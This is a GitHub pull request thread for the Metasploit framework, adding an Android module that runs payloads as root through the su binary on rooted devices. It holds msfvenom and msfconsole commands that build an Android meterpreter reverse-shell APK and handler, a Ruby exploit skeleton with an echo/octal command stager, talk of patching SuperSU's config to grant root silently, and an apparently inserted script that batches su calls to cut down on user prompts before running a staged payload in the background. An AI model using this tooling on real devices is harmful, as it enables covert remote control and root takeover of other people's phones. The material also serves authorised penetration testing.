Add an Android module to run payloads with su on a rooted device #10012

Merged (5 commits, Mar 7, 2019)

6 participants
@timwr (Contributor) commented May 12, 2018

This is a quick module that allows you to run payloads with the /system/xbin/su binary present on a rooted Android device. This effectively works as a local root exploit but may require the user to grant permission.

Verification

List the steps needed to make sure this thing works

  • Get a normal Android meterpreter session, e.g.:
      msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost LHOST; set lport 4444; set ExitOnSession false; run -j"
      msfvenom -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o meterpreter.apk
      ...
  • Use the module, e.g.:
      msf5 exploit(multi/handler) > use exploit/android/local/su_exec
      msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
      payload => linux/aarch64/meterpreter/reverse_tcp
      msf5 exploit(android/local/su_exec) > set SESSION -1
      SESSION => -1
      msf5 exploit(android/local/su_exec) > set LHOST LHOST
      LHOST => LHOST
      msf5 exploit(android/local/su_exec) > set LPORT 4433
      LPORT => 4433
      msf5 exploit(android/local/su_exec) > run
  • Verify you get a working Linux meterpreter session as uid 0
  • Verify the existing Android session is still working
  • Document the thing and how it works (Example)
@timwr (Contributor, Author) commented May 12, 2018

You might find this module useful for testing #9964 and #9956

@Auxilus (Contributor) commented May 12, 2018

nice work @timwr

@timwr (Contributor, Author) commented May 12, 2018

This is definitely worth discussing, but the way I saw it was you would use this module (or any other root exploit) to gain a new meterpreter/shell session as root, and (post/gather) modules that require root would use the root session (and fail if they were run on a non root session).

@Auxilus (Contributor) commented May 13, 2018

Yeah, makes sense. That way the post modules won't need to specify the SU_BINARY at all?

@bcoles (Contributor) commented May 13, 2018

A few (untested) suggestions:

  include Msf::Post::File
  include Msf::Post::Android::Priv

  def base_dir
    datastore['WritableDir'].to_s
  end

  def su_bin
    datastore['SU_BINARY'].to_s
  end

  def exploit
    # Nothing to escalate if the session already runs as root
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    # The su binary must exist at the configured path
    unless file_exist? su_bin
      fail_with Failure::BadConfig, "#{su_bin} does not exist"
    end

    # The staging directory must be writable
    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Per-line budget for the echo stager, reduced by the length of the su path
    linemax = 4088 - su_bin.size
    execute_cmdstager({
      flavor: :echo,
      enc_format: :octal,
      prefix: '\\\\0',
      temp: base_dir,
      linemax: linemax,
      background: true,
    })
  end
@Auxilus (Contributor) commented May 13, 2018

Stupid question about the prompt:

/data/data/eu.chainfire.supersu/files/supersu.cfg holds the priv config for apps.

If we try to overwrite it to set access=2 for [com.metasploit.stage], will it go through the existing list and then execute the command (which will lead to giving the user a prompt), or will it first execute the command?

@timwr (Contributor, Author) commented Aug 19, 2018

Apologies for losing track of this one.
@bcoles I've added an is_root check, but we can't really check whether the temporary directory is writable without executing su (it's not writable from within the app sandbox), and each execution of su may produce an alert to the user (so it's better to do it only once).
@Auxilus as discussed, we could totally patch supersu.cfg if we have root access already, but not without root which makes it less useful.
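The two points raised above, bcoles' echo/octal cmdstager suggestion and timwr's note that every su execution may alert the user and should therefore happen as rarely as possible, can be shown together in one self-contained script. This is an added example, not code from this pull request or from Metasploit's CmdStager: it encodes a payload into `echo -en` lines that respect the same `4088 - su_bin.size` line budget, then packs those lines into the fewest `su -c "..."` invocations that fit a per-command size budget, so a small payload triggers su (and any prompt) exactly once. The staging directory, the `stage` file name, the `CMD_MAX` budget, the `rm -f`/`chmod 700`/background commands and the single-quote quoting are assumptions of this example, not the module's behaviour.

```ruby
#!/usr/bin/env ruby
# Added example, not from the pull request or Metasploit. It builds echo/octal
# stager lines for a payload and batches them into as few `su -c` invocations as
# possible, so the su prompt on a rooted device is raised once for small payloads.

SU_BINARY    = '/system/xbin/su'        # SU_BINARY option from the thread
WRITABLE_DIR = '/data/local/tmp'        # assumed staging directory
LINEMAX      = 4088 - SU_BINARY.size    # per-line budget, as in the suggestion above
CMD_MAX      = 64 * 1024                # assumed budget per su -c argument (Linux MAX_ARG_STRLEN is 128 KiB)

# Encode bytes as \0ooo escapes; `echo -e` in bash, mksh and toybox decodes these as octal.
def octal_escape(bytes)
  bytes.map { |b| format('\\0%03o', b) }.join
end

# Split a payload into `echo -en '<escapes>' >> <path>` lines, none longer than linemax.
# Single quotes keep the backslashes intact when the line later sits inside su -c "...".
def stager_lines(payload, path, linemax = LINEMAX)
  overhead = "echo -en '' >> #{path}".size
  per_line = (linemax - overhead) / 5          # every byte costs five characters
  raise ArgumentError, 'linemax too small for a single byte' if per_line < 1
  payload.b.bytes.each_slice(per_line).map do |chunk|
    "echo -en '#{octal_escape(chunk)}' >> #{path}"
  end
end

# Pack the lines into the fewest su -c commands that each fit in cmd_max bytes. The
# first batch removes a stale file so the appends start clean; the last one makes
# the staged file executable and backgrounds it (the `background: true` idea).
def su_commands(lines, path, su = SU_BINARY, cmd_max = CMD_MAX)
  batches = [["rm -f #{path}"]]
  lines.each do |line|
    candidate = "#{su} -c \"#{(batches.last + [line]).join('; ')}\""
    if candidate.size > cmd_max
      batches << [line]
    else
      batches.last << line
    end
  end
  batches.last.push("chmod 700 #{path}", "#{path} &")
  batches.map { |batch| "#{su} -c \"#{batch.join('; ')}\"" }
end

# Offline check: decode the escapes the way `echo -en` would, without touching a shell.
def decode_stager(lines)
  lines.map { |line| line[/'([^']*)'/, 1] }.join
       .scan(/\\0([0-7]{3})/).flatten
       .map { |oct| oct.to_i(8).chr }.join.b
end

if __FILE__ == $PROGRAM_NAME
  # Constructed stand-in for a payload; a real module would use generate_payload_exe.
  payload = "\x7fELF\x02\x01\x01\x00".b + ("stage bytes " * 300).b + "\xff\x00".b
  path    = File.join(WRITABLE_DIR, 'stage')
  lines   = stager_lines(payload, path)
  cmds    = su_commands(lines, path)
  puts "#{lines.size} stager line(s) packed into #{cmds.size} su invocation(s)"
  puts "round trip ok: #{decode_stager(lines) == payload}"
  puts cmds.first[0, 120] + '...'
end
```

Lowering `CMD_MAX` shows the trade-off timwr describes: a payload that no longer fits a single argument needs a second `su -c`, and each extra invocation is another chance for the su manager to prompt the user.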

@Auxilus (Contributor) commented Aug 19, 2018

gotcha

@timwr (Contributor, Author) commented Oct 1, 2018

I've added some documentation but while testing I've come across a strange bug with cmd_exec not returning :(

@timwr timwr added delayed and removed needs-docs labels Oct 1, 2018

@timwr timwr force-pushed the timwr:su_exec branch from a598943 to b16ccae Oct 1, 2018

@timwr timwr force-pushed the timwr:su_exec branch from b16ccae to dea3f90 Oct 1, 2018

@wchen-r7 wchen-r7 removed the delayed label Oct 17, 2018

@wchen-r7 wchen-r7 self-assigned this Oct 17, 2018

@wchen-r7 wchen-r7 added the module label Oct 17, 2018

@busterb busterb self-assigned this Mar 7, 2019

@busterb busterb merged commit dea3f90 into rapid7:master Mar 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Mar 7, 2019

@busterb (Contributor) commented Mar 7, 2019

Release Notes

The android/local/su_exec exploit module has been added to the framework. This module runs payloads with escalated privileges on rooted Android devices.

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2019
